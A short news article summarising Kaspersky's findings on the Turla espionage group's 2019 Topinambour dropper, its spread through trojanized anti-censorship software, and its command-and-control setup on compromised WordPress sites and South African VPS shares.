Turla APT, also known as, Waterbug, Venomous Bear and by many other names, was found using a new dropper in a recent campaign this year. The discovery was made by security researchers from Kaspersky.
Russian-speaking Turla (a.k.a. Snake, Venomous Bear, Waterbug and Uroboros) is known for spy campaigns targeting Western governments as well as embassies and consulates in post-Soviet states. It’s been active since at least 2014 (and possibly earlier) developing a range of custom backdoors to carry out its work. It continually evolves both in terms of malware and targets.
The Turla APT has revamped its arsenal in 2019, creating new weapons and tools for targeting government entities. It’s now using booby-trapped anti-internet censorship software as an initial infection vector, suggesting Turla is going after dissident or other civil-society targets.
The Topinambour dropper contains what Kaspersky calls a “tiny .NET shell” that will wait for Windows shell commands from the command-and-control server (C2) and silently execute them. The C2 infrastructure is hosted on compromised WordPress sites and cloud services.
“Using this and SMB shares on rented virtual private servers (VPS) [in South Africa], the campaign operators spread the next-stage modules using just ‘net use’ and ‘copy’ Windows shell commands,” the researchers noted.
The trojans upload, download and execute files, and fingerprint target systems. The PowerShell version of the trojan also can capture screenshots. They communicate with the C2 from an opened SMB share on a remote CELL-C VPS in South Africa.
And, they also retrieve a final-stage, more complex trojan, able to parse and execute custom commands from the C2, the researchers added. During the final stage of infection, this encrypted trojan for remote administration is embedded into the computer’s registry for the malware to access when complete.